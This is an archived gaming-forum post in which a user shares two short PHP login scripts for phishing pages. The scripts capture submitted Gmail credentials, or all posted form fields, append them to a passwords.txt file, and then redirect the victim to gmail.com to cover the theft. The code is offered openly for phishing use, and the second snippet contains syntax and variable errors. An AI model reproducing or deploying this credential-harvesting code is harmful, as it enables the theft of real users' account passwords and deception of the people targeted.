A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

[PHP]Some Custom Login.php

1.6k views · started by Domo™ · · closed
#1
[PHP]Some Custom Login.php
So i made a custom login.php to log your accounts to a file.

Only use this for gmail phisher
$stuff = "Email: " . $_POST["Email"] . "Password: " . $_POST["Passwd"] . "\r\n\n";
$file = fopen("passwords.txt","a");
fwrite($file,$stuff);
fclose($file);


This works for any phisher.
$file = fopen("passwords.txt","a");
foreach($_POST as $variable => $value)
{
fwrite($f, $variable . " = " . $value . "\r\n\n";
}
fclose($file);
header("location: http://gmail.com");